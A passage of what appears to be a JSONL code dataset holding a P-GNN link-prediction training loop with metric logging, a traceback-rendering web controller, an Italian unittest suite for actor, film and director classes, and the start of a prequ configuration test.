:]).long().to(device))\n nodes_second = torch.index_select(out, 0, torch.from_numpy(edge_mask_train[1, :]).long().to(device))\n pred = torch.sum(nodes_first * nodes_second, dim=-1)\n label_positive = torch.ones([data.mask_link_positive_train.shape[1], ], dtype=pred.dtype)\n label_negative = torch.zeros([data.mask_link_negative_train.shape[1], ], dtype=pred.dtype)\n label = torch.cat((label_positive, label_negative)).to(device)\n loss_train += loss_func(pred, label).cpu().data.numpy()\n auc_train += roc_auc_score(label.flatten().cpu().numpy(), out_act(pred).flatten().data.cpu().numpy())\n fpr, tpr, thresholds = roc_curve(label.flatten().cpu().numpy(),\\\n out_act(pred).flatten().data.cpu().numpy())\n optimal_idx = np.argmax(tpr - fpr)\n threshold = thresholds[optimal_idx]\n #print(threshold)\n\n label_train_numpy = np.where(label.flatten().cpu().numpy() > threshold , 1 , 0)\n pred_train_numpy = np.where(out_act(pred).flatten().data.cpu().numpy()>threshold, 1 ,0)\n accuracy_train += accuracy_score(label_train_numpy,pred_train_numpy)\n precision_train += precision_score(label_train_numpy,pred_train_numpy)\n recall_train += recall_score(label_train_numpy,pred_train_numpy)\n f1_train += f1_score(label_train_numpy,pred_train_numpy)\n # val\n edge_mask_val = np.concatenate((data.mask_link_positive_val, data.mask_link_negative_val), axis=-1)\n nodes_first = torch.index_select(out, 0, torch.from_numpy(edge_mask_val[0, :]).long().to(device))\n nodes_second = torch.index_select(out, 0, torch.from_numpy(edge_mask_val[1, :]).long().to(device))\n pred = torch.sum(nodes_first * nodes_second, dim=-1)\n label_positive = torch.ones([data.mask_link_positive_val.shape[1], ], dtype=pred.dtype)\n label_negative = torch.zeros([data.mask_link_negative_val.shape[1], ], dtype=pred.dtype)\n label = torch.cat((label_positive, label_negative)).to(device)\n loss_val += loss_func(pred, label).cpu().data.numpy()\n auc_val += roc_auc_score(label.flatten().cpu().numpy(), out_act(pred).flatten().data.cpu().numpy())\n label_val_numpy = np.where(label.flatten().cpu().numpy()>threshold,1,0)\n pred_val_numpy = np.where(out_act(pred).flatten().data.cpu().numpy()>threshold,1,0)\n accuracy_val += accuracy_score(label_val_numpy, pred_val_numpy)\n precision_val += precision_score(label_val_numpy, pred_val_numpy)\n recall_val += recall_score(label_val_numpy, pred_val_numpy)\n f1_val += f1_score(label_val_numpy, pred_val_numpy)\n\n # test\n edge_mask_test = np.concatenate((data.mask_link_positive_test, data.mask_link_negative_test), axis=-1)\n nodes_first = torch.index_select(out, 0, torch.from_numpy(edge_mask_test[0, :]).long().to(device))\n nodes_second = torch.index_select(out, 0, torch.from_numpy(edge_mask_test[1, :]).long().to(device))\n pred = torch.sum(nodes_first * nodes_second, dim=-1)\n label_positive = torch.ones([data.mask_link_positive_test.shape[1], ], dtype=pred.dtype)\n label_negative = torch.zeros([data.mask_link_negative_test.shape[1], ], dtype=pred.dtype)\n label = torch.cat((label_positive, label_negative)).to(device)\n loss_test += loss_func(pred, label).cpu().data.numpy()\n auc_test += roc_auc_score(label.flatten().cpu().numpy(), out_act(pred).flatten().data.cpu().numpy())\n label_test_numpy = np.where(label.flatten().cpu().numpy()>threshold,1,0)\n pred_test_numpy = np.where(out_act(pred).flatten().data.cpu().numpy()>threshold,1,0)\n accuracy_test += accuracy_score(label_test_numpy, pred_test_numpy)\n precision_test += precision_score(label_test_numpy, pred_test_numpy)\n recall_test += recall_score(label_test_numpy, pred_test_numpy)\n f1_test += f1_score(label_test_numpy, pred_test_numpy)\n\n loss_train /= id+1\n loss_val /= id+1\n loss_test /= id+1\n emb_norm_min /= id+1\n emb_norm_max /= id+1\n emb_norm_mean /= id+1\n auc_train /= id+1\n auc_val /= id+1\n auc_test /= id+1\n accuracy_train /= id+1\n accuracy_val /= id+1\n accuracy_test /= id+1\n precision_train /= id+1\n precision_val /= id+1\n precision_test /= id+1\n recall_train /= id+1\n recall_val /= id+1\n recall_test /= id+1\n f1_train /= id+1\n f1_val /= id+1\n f1_test /= id+1\n\n print(\"\\n\",repeat, epoch, 'Loss {:.4f}'.format(loss_train), 'Train AUC: {:.4f}'.format(auc_train),\n 'Val AUC: {:.4f}'.format(auc_val), 'Test AUC: {:.4f}'.format(auc_test))\n print(repeat, epoch, 'Train Acc {:.4f}'.format(accuracy_train), 'Val Acc: {:.4f}'.format(accuracy_val),\n 'Test Acc: {:.4f}'.format(accuracy_test), 'Train prec: {:.4f}'.format(precision_train), \\\n 'Val prec: {:.4f}'.format(precision_val),'Test prec: {:.4f}'.format(precision_test))\n print(repeat, epoch, 'Train Rec {:.4f}'.format(recall_train),\n 'Val Rec: {:.4f}'.format(recall_val),\n 'Test Rec: {:.4f}'.format(recall_test), 'Train F1: {:.4f}'.format(f1_train), \\\n 'Val F1: {:.4f}'.format(f1_val), 'Test F1: {:.4f}'.format(f1_test))\n\n writer_train.add_scalar('repeat_' + str(repeat) + '/auc_'+dataset_name, auc_train, epoch)\n writer_train.add_scalar('repeat_' + str(repeat) + '/loss_'+dataset_name, loss_train, epoch)\n writer_val.add_scalar('repeat_' + str(repeat) + '/auc_'+dataset_name, auc_val, epoch)\n writer_train.add_scalar('repeat_' + str(repeat) + '/loss_'+dataset_name, loss_val, epoch)\n writer_test.add_scalar('repeat_' + str(repeat) + '/auc_'+dataset_name, auc_test, epoch)\n writer_test.add_scalar('repeat_' + str(repeat) + '/loss_'+dataset_name, loss_test, epoch)\n\n writer_train.add_scalar('repeat_' + str(repeat) + '/acc_' + dataset_name, accuracy_train, epoch)\n writer_train.add_scalar('repeat_' + str(repeat) + '/prec_' + dataset_name, precision_train, epoch)\n writer_val.add_scalar('repeat_' + str(repeat) + '/acc_' + dataset_name, accuracy_val, epoch)\n writer_train.add_scalar('repeat_' + str(repeat) + '/prec_' + dataset_name, precision_val, epoch)\n writer_test.add_scalar('repeat_' + str(repeat) + '/acc_' + dataset_name, accuracy_test, epoch)\n writer_test.add_scalar('repeat_' + str(repeat) + '/prec_' + dataset_name, precision_val, epoch)\n\n writer_train.add_scalar('repeat_' + str(repeat) + '/rec_' + dataset_name, recall_train, epoch)\n writer_train.add_scalar('repeat_' + str(repeat) + '/f1_' + dataset_name, f1_train, epoch)\n writer_val.add_scalar('repeat_' + str(repeat) + '/rec_' + dataset_name, recall_val, epoch)\n writer_train.add_scalar('repeat_' + str(repeat) + '/f1_' + dataset_name, f1_val, epoch)\n writer_test.add_scalar('repeat_' + str(repeat) + '/rec_' + dataset_name, recall_test, epoch)\n writer_test.add_scalar('repeat_' + str(repeat) + '/f1_' + dataset_name, f1_test, epoch)\n\n\n writer_test.add_scalar('repeat_' + str(repeat) + '/emb_min_'+dataset_name, emb_norm_min, epoch)\n writer_test.add_scalar('repeat_' + str(repeat) + '/emb_max_'+dataset_name, emb_norm_max, epoch)\n writer_test.add_scalar('repeat_' + str(repeat) + '/emb_mean_'+dataset_name, emb_norm_mean, epoch)\n\n result_val.append(auc_val)\n result_auc.append(auc_test)\n result_acc.append(accuracy_test)\n result_prec.append(precision_test)\n result_rec.append(recall_test)\n result_f1.append(f1_test)\n\n\n result_val = np.array(result_val)\n result_auc = np.array(result_auc)\n index = np.argmax(result_val)\n results_auc.append(result_auc[index])\n results_acc.append(result_acc[index])\n results_prec.append(result_prec[index])\n results_rec.append(result_rec[index])\n results_f1.append(result_f1[index])\n\n\n\n results_auc = np.array(results_auc)\n results_acc = np.array(results_acc)\n results_prec = np.array(results_prec)\n results_rec = np.array(results_rec)\n results_f1 = np.array(results_f1)\n print('-----------------Final-------------------')\n #print(results_mean, results_std)\n with open('results/{}_{}_{}_layer{}_approximate{}.txt'.format(args.task,args.model,dataset_name,args.layer_num,args.approximate), 'w') as f:\n f.write('AUC : {}, {}\\n'.format(np.mean(results_auc).round(6), np.std(results_auc).round(6)))\n f.write('ACC : {}, {}\\n'.format(np.mean(results_acc).round(6), np.std(results_acc).round(6)))\n f.write('PREC : {}, {}\\n'.format(np.mean(results_prec).round(6), np.std(results_prec).round(6)))\n f.write('REC : {}, {}\\n'.format(np.mean(results_rec).round(6), np.std(results_rec).round(6)))\n f.write('F1 : {}, {}\\n'.format(np.mean(results_f1).round(6), np.std(results_f1).round(6)))\n\n# export scalar data to JSON for external processing\nwriter_train.export_scalars_to_json(\"./all_scalars.json\")\nwriter_train.close()\nwriter_val.export_scalars_to_json(\"./all_scalars.json\")\nwriter_val.close()\nwriter_test.export_scalars_to_json(\"./all_scalars.json\")\nwriter_test.close()\n","sub_path":"P-GNN/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":18782,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"553177383","text":"__author__ = 'Nuclight.atomAltera'\n\nfrom .import Controller\nimport sys, traceback\n\nclass TracebackController(Controller):\n\tdef __init__(self, environ):\n\t\tsuper(TracebackController, self).__init__(environ, None)\n\n\tdef _process(self):\n\t\ttrace = traceback.format_exception(*sys.exc_info())\n\n\t\tself._response.text =\\\n\t\t'''\n\t\t\n\t\t\t500 - Autoblog fatal error\n\t\t\t\n\t\t\t\t

500 - Autoblog Internal Error

\n\t\t\t\t
\n\t\t\t\t\t{traceback}\n\t\t\t\t
\n\t\t\t\n\t\t\n\n\t\t'''.format(traceback='
'.join(trace).replace('\\n', '
'))\n\n\t\tself._response.code = 500\n","sub_path":"controllers/tracebackController.py","file_name":"tracebackController.py","file_ext":"py","file_size_in_byte":777,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"201522790","text":"import copy\nimport unittest\nimport testlib\nimport json\nimport random\nfrom ddt import file_data, ddt, data, unpack\n\nfrom program03 import Attore, Film, Regista, leggi_archivio_attori, leggi_archivio_film\n\npippo = 42\n\n@ddt\nclass Test(testlib.TestCase):\n\n @classmethod\n def setUpClass(cls):\n '''Carico i file per avere pezzi di json a disposizione'''\n with open('actors.json', encoding='utf8') as f:\n cls.attori_json = json.load(f)\n with open('films.json', encoding='utf8') as f:\n cls.films_json = json.load(f)\n\n################################################################################\n\n def do_check_attore(self, a, nome, msg=''):\n '''Verifica che l'attore sia proprio quello del catalogo_attori'''\n self.assertEqual(type(a), Attore, f\"Gli attori {msg} devono essere istanze di Attore\")\n a1 = self.attori[nome]\n self.assertEqual(a.nome(), nome, f\"L'attore {msg} non è {nome}\")\n self.assertTrue(a1 is a,\n f\"Gli attori {msg} devono essere le stesse istanze che stanno nel catalogo_attori'\")\n\n def do_check_film(self, f, titolo, msg=''):\n '''Verifica che il film sia proprio quello del catalogo_film'''\n self.assertEqual(type(f), Film, f\"I film {msg} devono essere istanze di Film\")\n f1 = self.films[titolo]\n self.assertEqual(f.titolo(), titolo, f\"Il film {msg} non è {titolo}\")\n self.assertTrue(f1 is f,\n f\"I film {msg} devono essere le stesse istanze che stanno nel catalogo_films'\")\n\n def do_check_regista(self, r, nome, msg=''):\n '''Verifica che il regista sia proprio quello del catalogo_registi'''\n self.assertEqual(type(r), Regista, f\"I registi {msg} devono essere istanze di Regista\")\n r1 = self.registi[nome]\n self.assertEqual(r.nome(), nome, f\"Il regista {msg} non è {nome}\")\n self.assertTrue(r1 is r,\n f\"I registi {msg} devono essere le stesse istanze che stanno nel catalogo_registi'\")\n\n def do_test_gruppo_attori(self, attori, tipo, nomi, msg=''):\n '''Verifica che gli attori tornati siano solo quelli indicati'''\n self.assertEqual(type(attori), tipo, f\"{msg} deve tornare un {tipo}\")\n self.assertEqual(len(attori), len(nomi), f\"Gli attori tornati devono essere {len(nomi)}\")\n for a in attori:\n self.assertTrue(a.nome() in nomi, f\"L'attore {a.nome()} non va tornato da {msg}\")\n self.do_check_attore(a, a.nome(), f'tornato da {msg}')\n for nome in nomi:\n a = self.attori[nome]\n self.assertTrue(a in attori, f\"L'attore {nome} manca nell'elenco tornato da {msg})\")\n\n def do_test_gruppo_film(self, films, tipo, titoli, msg=''):\n '''Verifica che i film tornati siano solo quelli indicati'''\n self.assertEqual(type(films), tipo, f\"{msg} deve tornare un {tipo}\")\n self.assertEqual(len(films), len(titoli), f\"I film tornati devono essere {len(titoli)}\")\n for f in films:\n self.assertTrue(f.titolo() in titoli, f\"Il film {f.titolo()} non va tornato da {msg}\")\n self.do_check_film(f, f.titolo(), f'tornato da {msg}')\n for t in titoli:\n f = self.films[t]\n self.assertTrue(f in films, f\"Il film {t} manca nell'elenco tornato da {msg})\")\n\n def do_test_gruppo_registi(self, registi, tipo, nomi, msg=''):\n '''Verifica che gli attori tornati siano solo quelli indicati'''\n self.assertEqual(type(registi), tipo, f\"{msg} deve tornare un {tipo}\")\n self.assertEqual(len(registi), len(nomi), f\"I registi tornati devono essere {len(nomi)}\")\n for r in registi:\n self.assertTrue(r.nome() in nomi, f\"Il regista {r.nome()} non va tornato da {msg}\")\n self.do_check_regista(r, r.nome(), f'tornato da {msg}')\n for nome in nomi:\n r = self.registi[nome]\n self.assertTrue(r in registi, f\"Il regista {nome} manca nell'elenco tornato da {msg})\")\n\n################################################################################\n\n @data(\n ['actors.json', 22233],\n )\n @unpack\n def test_00_load_attori(self, filename, N):\n '''controlla che vengano caricati gli attori'''\n with self.ignored_function('builtins.print'), self.ignored_function('pprint.pprint'):\n attori = leggi_archivio_attori(filename)\n self.assertEqual(type(attori), dict, \"Il risultato non è un dizionario\")\n self.assertEqual(len(attori), N, f\"Il dizionario creato da {filename} deve contenere {N} attori\")\n for a in attori.values():\n self.assertEqual(type(a), Attore)\n Test.attori = attori\n\n @data(\n ['films.json', 2359, 1250],\n )\n @unpack\n def test_01_load_films(self, filename, NF, NR):\n '''controlla che vengano caricati i films e i registi'''\n with self.ignored_function('builtins.print'), self.ignored_function('pprint.pprint'):\n res = leggi_archivio_film(filename, Test.attori)\n self.assertEqual(type(res), tuple, \"il risultato non è una tupla\")\n self.assertEqual(len(res), 2, \"il risultato non ha due elementi\")\n films, registi = res\n self.assertEqual(type(films), dict, \"Il catalogo_film non è un dizionario\")\n self.assertEqual(len(films), NF, f\"Il dizionario creato da {filename} deve contenere {NF} films\")\n self.assertEqual(type(registi), dict, \"Il catalogo_registi non è un dizionario\")\n self.assertEqual(len(registi), NR, f\"Il catalogo_registi creato da {filename} deve contenere {NR} registi\")\n for f in films.values():\n self.assertEqual(type(f), Film, \"Tutti i valori di catalogo_film devono essere Film\")\n for r in registi.values():\n self.assertEqual(type(r), Regista, \"Tutti i valori di catalogo_registi devono essere Regista\")\n Test.films = films\n Test.registi = registi\n\n # TODO: controllo su almeno un paio di attori, film e registi\n\n################################################################################\n\n def do_test_Attore_dati_base(self, attore, nome, eta, genere, truename):\n '''Verifica che l'attore contenga i dati base'''\n self.assertEqual(type(attore), Attore, \"Non è una istanza di Attore\")\n self.assertEqual(attore.nome(), nome, f\"Il nome dell'attore non è {nome}\")\n self.assertEqual(attore.eta(), eta, f\"L'attore {nome} deve avere {eta} anni\")\n self.assertEqual(attore.genere(), genere, f\"L'attore {nome} è di genere {genere}\")\n self.assertEqual(attore.vero_nome(),truename, f\"L'attore {nome} si chiamava {truename}\")\n\n @data(\n # name age sex vero_nome\n ['Marilyn Monroe', 37, 'F', 'Norma Jeane Mortenson' ],\n ['David Bowie', 72, 'M', 'David Robert Haywood Jones' ],\n ['Marlon Brando', 81, 'M', 'Marlon Brando Jr.' ],\n ['Benedict Cumberbatch', 43, 'M', 'Benedict Timothy Carlton Cumberbatch' ],\n )\n @unpack\n def test_10_new_Attore(self, nome, eta, genere, truename):\n '''Controlla che l'attore venga creato correttamente da un blocco di dati json'''\n json_data = self.attori_json[nome]\n attore = Attore(json_data)\n self.do_test_Attore_dati_base(attore, nome, eta, genere, truename)\n self.assertEqual(attore.films(), set(),\n f\"I film dell'attore all'inizio devono essere un insieme vuoto\")\n\n################################################################################\n\n @data(\n # nome eta sex vero_nome\n # titoli\n ['Marilyn Monroe', 37, 'F', 'Norma Jeane Mortenson' ],\n ['Scarlett Johansson', 35, 'F', 'Scarlett Ingrid Johansson' ],\n ['Benedict Cumberbatch', 43, 'M', 'Benedict Timothy Carlton Cumberbatch'],\n )\n @unpack\n def test_11_Attore_from_catalogo_attori(self, nome, eta, genere, vnome):\n '''Controlla che l'attore sia stato creato correttamente dal caricamento del file'''\n self.assertTrue(nome in self.attori, f\"L'attore {nome} deve apparire nel catalogo_attori\")\n attore = self.attori[nome]\n self.do_test_Attore_dati_base(attore, nome, eta, genere, vnome)\n\n @data(\n # nome\n ['Marilyn Monroe',\n ['The Misfits', 'All About Eve', 'Monkey Business', 'The Seven Year Itch', 'Niagara',\n 'The Asphalt Jungle', 'Some Like It Hot', 'Gentlemen Prefer Blondes']],\n ['Scarlett Johansson',\n ['Vicky Cristina Barcelona', \"The Man Who Wasn't There\", 'Lost in Translation',\n 'The Avengers', 'The Prestige', 'Ghost World', 'We Bought a Zoo', 'Girl with a Pearl Earring',\n 'Iron Man 2', 'Match Point', 'A Love Song for Bobby Long']],\n ['Benedict Cumberbatch',\n ['The Whistleblower', 'War Horse', 'Atonement', 'Amazing Grace', 'Tinker Tailor Soldier Spy']],\n )\n @unpack\n # Attore.films()\n def test_12_Attore_films(self, nome, titoli ):\n attore = self.attori[nome]\n films = attore.films()\n self.do_test_gruppo_film(films, set, titoli, f\"Attore.films()\")\n\n @data(\n # nome NA\n ['Marilyn Monroe', 84],\n ['Scarlett Johansson', 148],\n ['Benedict Cumberbatch', 67],\n )\n @unpack\n # Attore.coprotagonisti()\n def test_13_Attore_numero_coprotagonisti(self, nome, NA):\n attore = self.attori[nome]\n attori = attore.coprotagonisti()\n self.assertEqual(len(attori), NA, f\"L'attore {nome} ha avuto {NA} coprotagonisti\")\n for a in attori:\n self.do_check_attore(a, a.nome(), f'con cui ha lavorato {nome}')\n\n @data(\n # nome registi\n ['Marilyn Monroe',\n ['Howard Hawks', 'Henry Hathaway', 'Billy Wilder', 'Joseph L. Mankiewicz', 'John Huston']\n ],\n ['Scarlett Johansson',\n ['Woody Allen', 'Terry Zwigoff', 'Shainee Gabel', 'Joel Coen', 'Christopher Nolan', 'Peter Webber',\n 'Joss Whedon', 'and 1 more credit', 'Sofia Coppola', 'Cameron Crowe', 'Jon Favreau']\n ],\n ['Benedict Cumberbatch',\n ['Tomas Alfredson', 'Larysa Kondracki', 'Michael Apted', 'Steven Spielberg', 'Joe Wright']],\n )\n @unpack\n # Attore.registi()\n def test_14_Attore_registi(self, nome, nomi):\n attore = self.attori[nome]\n registi = attore.registi()\n self.do_test_gruppo_registi(registi, set, nomi, f\"Attore.registi()\")\n\n @data(\n # nome PR\n ['Marilyn Monroe', 'Billy Wilder' ],\n ['Scarlett Johansson', 'Woody Allen' ],\n ['Benedict Cumberbatch', 'Joe Wright' ],\n )\n @unpack\n # Attore.regista_preferito()\n def test_15_Attore_regista_preferito(self, nome, PR):\n attore = self.attori[nome]\n r = attore.regista_preferito()\n self.do_check_regista(r, PR, f'preferito di {nome}')\n\n @data(\n # nome minD maxD titoli\n ['Marilyn Monroe', 90, 110,\n ['Gentlemen Prefer Blondes',\n 'Niagara',\n 'Monkey Business',\n 'The Seven Year Itch',\n ],\n ],\n ['Scarlett Johansson', 90, 120,\n ['Vicky Cristina Barcelona',\n 'Girl with a Pearl Earring',\n 'Lost in Translation',\n 'Ghost World',\n 'Match Point',\n 'The Man Who Wasn\\'t There',\n 'A Love Song for Bobby Long',\n ],\n ],\n ['Benedict Cumberbatch', 120, None,\n ['Atonement',\n 'Tinker Tailor Soldier Spy',\n 'War Horse',\n ],\n ],\n )\n @unpack\n # Attore.film_durata(minD, maxD)\n def test_16_Attore_film_durata(self, nome, minD, maxD, titoli):\n attore = self.attori[nome]\n films = attore.film_durata(minD, maxD)\n self.do_test_gruppo_film(films, list, titoli)\n self.assertEqual(films, [self.films[t] for t in titoli])\n\n @data(\n # nome coppiette\n ['Scarlett Johansson',\n [('Robert Downey Jr.', 'Scarlett Johansson', 2),\n ('Samuel L. Jackson', 'Scarlett Johansson', 2),\n ('Paul Bettany', 'Scarlett Johansson', 2),\n ('Clark Gregg', 'Scarlett Johansson', 2),\n ],\n ],\n ['Woody Allen',\n [('Woody Allen', 'Diane Keaton', 6),\n ('Woody Allen', 'Joan Neuman', 2),\n ('Woody Allen', 'Anjelica Huston', 2),\n ('Woody Allen', 'Helen Hanft', 2),\n ('Woody Allen', 'Janet Margolin', 2),\n ('Woody Allen', 'Julia Louis-Dreyfus', 2),\n ('Woody Allen', 'Stephanie Roth Haberle', 2),\n ('Woody Allen', 'Mia Farrow', 4)\n ]\n ],\n )\n @unpack\n # Attore.in_coppia()\n def test_17_Attore_in_coppia_empty(self, nome, coppiette):\n attore = self.attori[nome]\n\n incoppia = attore.in_coppia()\n # print(\"################\\n\", [ (m.nome(), f.nome(), n) for m,f,n in incoppia] )\n self.assertEqual(type(incoppia), set, \"Attore.in_coppia() deve tornare un set di tuple\")\n for t in incoppia:\n self.assertEqual(len(t), 3, \"Attore.in_coppia() deve tornare un set di terne\")\n male, female, Nf = t\n self.assertEqual(type(male), Attore, \"Attore.in_coppia() deve tornare un set di terne il cui primo elemento è un Attore\")\n self.assertEqual(type(female), Attore, \"Attore.in_coppia() deve tornare un set di terne il cui secondo elemento è un Attore\")\n self.assertEqual(type(Nf), int, \"Attore.in_coppia() deve tornare un set di terne il cui terzo elemento è un int\")\n self.assertEqual(male.genere(), 'M')\n self.assertEqual(female.genere(), 'F')\n terna = male.nome(), female.nome(), Nf\n self.assertTrue(terna in coppiette, f\"La terna {terna} non va tornata\")\n self.do_check_attore(male, male.nome(), f'tornato da in_coppia()')\n self.do_check_attore(female, female.nome(), f'tornato da in_coppia()')\n for M,F,N in coppiette:\n MM = self.attori[M]\n FF = self.attori[F]\n terna = MM, FF, N\n self.assertTrue( terna in incoppia, f\"La terna {terna} manca nell'elenco tornato da in_coppia()\")\n\n @data(\n # nome partner titoli\n ['Marilyn Monroe', 'Cary Grant', ['Monkey Business']],\n ['Scarlett Johansson', 'Robert Downey Jr.', ['Iron Man 2', 'The Avengers',]],\n ['Benedict Cumberbatch', 'Keira Knightley', ['Atonement', ]],\n )\n @unpack\n # Attore.in_coppia(partner)\n def test_18_Attore_in_coppia_partner(self, nome, partner, titoli):\n attore = self.attori[nome]\n films = attore.in_coppia(partner)\n self.do_test_gruppo_film(films, set, titoli, f'Attore.in_coppia({partner})')\n\n # TODO: what else?\n\n @data(\n ['Marcello Mastroianni', 'France'],\n ['Woody Allen', 'USA' ],\n )\n @unpack\n def test_19_Attore_luogo_preferito(self, nome, LP):\n # Attore.attore_preferito()\n attore = self.attori[nome]\n luogo = attore.luogo_preferito()\n self.assertEqual(luogo, LP, f\"Il luogo preferito di {nome} è {LP}\")\n\n################################################################################\n\n def do_check_Film_dati_base(self, film, titolo, durata, anno, posti):\n '''Verifica che i dati di base del film ci siano'''\n posti = set(posti)\n self.assertEqual(type(film), Film, f\"{film} non è una istanza di Film\")\n self.assertEqual(film.titolo(), titolo, f\"Il titolo del Film non è {titolo}\")\n self.assertEqual(film.durata(), durata, f\"Il film {titolo} dovrebbe durare {durata} minuti\")\n self.assertEqual(film.anno(), int(anno), f\"Il film {titolo} è stato girato nel {anno}\")\n self.assertEqual(film.luoghi(), posti, f\"Il film {titolo} è stato girato in {posti}\")\n\n################################################################################\n\n @data(\n # titolo durata\n ['Blazing Saddles;1974', 93, ['USA'] ],\n ['Artificial Intelligence: AI;2001', 146, ['USA'] ],\n ['V for Vendetta;2005', 132, ['USA', 'UK', 'Germany'] ],\n # altri con durate strane\n )\n @unpack\n def test_20_new_Film(self, key, durata, posti):\n '''Controlla che il film venga creato correttamente da un blocco di dati json'''\n json_data = self.films_json[key]\n titolo, anno = key.split(';')\n film = Film(json_data)\n self.do_check_Film_dati_base(film, titolo, durata, anno, posti)\n self.assertEqual(film.attori(), set(), f\"Gli attori del film all'inizio devono essere un insieme vuoto\")\n self.assertEqual(film.registi(),set(), f\"I registi del film all'inizio devono essere un insieme vuoto\")\n\n # TODO: what else?\n\n################################################################################\n\n @data(\n # titolo min luoghi\n ['Blazing Saddles;1974', 93, ['USA'] ],\n ['Artificial Intelligence: AI;2001', 146, ['USA'] ],\n ['V for Vendetta;2005', 132, ['USA', 'UK', 'Germany'] ],\n ['Underground;1995', 167, ['Federal Republic of Yugoslavia', 'France', 'Germany',\n 'Bulgaria', 'Czech Republic', 'Hungary']],\n )\n @unpack\n def test_21_Film_from_catalogo_film(self, key, durata, posti):\n '''Controlla che il film sia nel dizionario catalogo_film'''\n titolo, anno = key.split(';')\n self.assertTrue(titolo in self.films, f\"Nel catalogo dei film ci dev'essere {titolo}\")\n film = self.films[titolo]\n self.do_check_Film_dati_base(film, titolo, durata, anno, posti)\n\n @data(\n # titolo\n ['Blazing Saddles;1974',\n ['Carol Arthur', 'Cleavon Little', 'Mel Brooks', 'George Furth', 'Richard Collier', 'David Huddleston',\n 'Slim Pickens', 'Madeline Kahn', 'Liam Dunn', 'Jack Starrett', 'Gene Wilder', 'Burton Gilliam',\n 'Harvey Korman', 'Alex Karras', 'John Hillerman']],\n ['Artificial Intelligence: AI;2001',\n ['Theo Greenly', 'Ken Leung', 'Jude Law', 'William Hurt', 'Clark Gregg', 'Haley Joel Osment',\n 'April Grace', 'Tom Gallop', 'Kevin Sussman', 'Eugene Osment', \"Frances O'Connor\",\n 'Sabrina Grdevich', 'Jake Thomas', 'Sam Robards', 'Matt Winston']],\n )\n @unpack\n def test_22_Film_attori(self, key, nomiA):\n titolo, anno = key.split(';')\n film = self.films[titolo]\n attori = film.attori()\n self.do_test_gruppo_attori( attori, set, nomiA, f\"Film.attori()\")\n\n @data(\n # titolo registi\n ['Blazing Saddles;1974', ['Mel Brooks']],\n ['Artificial Intelligence: AI;2001', ['Steven Spielberg']],\n )\n @unpack\n def test_23_Film_registi(self, key, nomiR):\n titolo, anno = key.split(';')\n film = self.films[titolo]\n registi = film.registi()\n # print('REGISTI', [r.nome() for r in registi])\n self.do_test_gruppo_registi(registi, set, nomiR, f\"Film.registi()\")\n\n # TODO: what else?\n\n################################################################################\n\n @data(\n ['Michelangelo Antonioni', ],\n ['Woody Allen', ],\n )\n @unpack\n def test_30_new_Regista(self, nome):\n '''Controlla che il film venga creato correttamente da un blocco di dati json'''\n regista = Regista(nome)\n self.assertEqual(type(regista), Regista, \"Non è stata creata una istanza di Regista\")\n self.assertEqual(regista.nome(), nome, f\"Il nome del Regista non è {nome}\")\n self.assertEqual(regista.films(), set(), f\"I film del regista all'inizio devono essere un insieme vuoto\")\n\n # TODO: what else?\n\n################################################################################\n\n @data(\n ['Michelangelo Antonioni', 7, 16],\n ['Woody Allen', 25, 43],\n )\n @unpack\n def test_31_Regista_from_catalogo_registi(self, nome, NF, anni):\n '''Controlla che il film sia stato creato correttamente dal caricamento del file'''\n self.assertTrue(nome in self.registi, f\"Il regista {nome} deve apparire nel catalogo_registi\")\n regista = self.registi[nome]\n self.assertEqual(type(regista), Regista, \"Nel catalogo_registi ci deve essere una istanza di Regista\")\n\n # Regista.nome()\n self.assertEqual(regista.nome(), nome, f\"Il nome del Regista è {nome}\")\n\n # Regista.anni_di_lavoro()\n self.assertEqual(regista.anni_di_lavoro(), anni, f\"Il regista {nome} ha lavorato {anni} anni\")\n\n @data(\n ['Michelangelo Antonioni',\n [\"L'eclisse\", 'La notte', 'Professione: reporter', 'Blowup', 'Il deserto rosso', 'Zabriskie Point',\n \"L'avventura\"]\n ],\n ['Woody Allen',\n ['Radio Days', 'Take the Money and Run', 'Bullets Over Broadway', 'Husbands and Wives', 'Stardust Memories',\n 'Match Point', 'Zelig', 'Manhattan', 'Manhattan Murder Mystery', 'The Purple Rose of Cairo', 'Whatever Works',\n 'Annie Hall', 'Love and Death', 'Sweet and Lowdown', 'Interiors', 'Another Woman', 'Crimes and Misdemeanors',\n 'Midnight in Paris', 'Deconstructing Harry', 'Broadway Danny Rose', 'Mighty Aphrodite',\n 'Vicky Cristina Barcelona', 'Bananas', 'Sleeper', 'Hannah and Her Sisters']\n ],\n )\n @unpack\n def test_31_Regista_films(self, nome, titoli):\n # Regista.films()\n regista = self.registi[nome]\n films = regista.films()\n # print(\"FILMS\", [f.titolo() for f in films])\n self.do_test_gruppo_film(films, set, titoli, f\"films del regista {nome}\")\n\n @data(\n # regista attore preferito\n ['Michelangelo Antonioni', 'Monica Vitti'],\n ['Woody Allen', 'Woody Allen'],\n )\n @unpack\n def test_31_Regista_attore_preferito(self, nome, AP):\n # Regista.attore_preferito()\n regista = self.registi[nome]\n a = regista.attore_preferito()\n self.do_check_attore(a, AP, f'attore preferito di {nome}')\n\n # TODO: what else?\n\n################################################################################\n\nif __name__ == '__main__':\n Test.main()\n\n","sub_path":"Homework Python 2018-19/homework03/test_03.py","file_name":"test_03.py","file_ext":"py","file_size_in_byte":23266,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"454468205","text":"# -*- coding: utf-8 -*-\n\nfrom __future__ import unicode_literals\n\nimport io\n\nimport pytest\n\nfrom prequ.configuration import (\n InvalidPrequConfiguration, NoPrequConfigurationFound, PrequConfiguration,\n UnknownWheelSource, get_data_errors, text)\n\nfrom .utils import create_configuration, in_temporary_directory\n\nfield_types = [\n ('text_item', text),\n ('int_item', int),\n ('list_item_int_value', [int]),\n ('dict_item', {text: text}),\n ('dict_item_int_value', {text: int}),\n ('dict_item_int_key', {int: text}),\n ('sub.int_item', int),\n ('sub.text_item', text),\n ('a.b.c', int),\n]\n\nok_data = {\n 'text_item': 'hello',\n 'int_item': 42,\n 'list_item_int_value': [1, 2, 3],\n 'dict_item': {'foo': 'bar', 'something': 'else'},\n 'dict_item_int_value': {'a': 1, 'b': 2},\n 'dict_item_int_key': {4: 'four', 2: 'two'},\n 'sub': {'text_item': 'hello'},\n 'a': {'b': {'c': 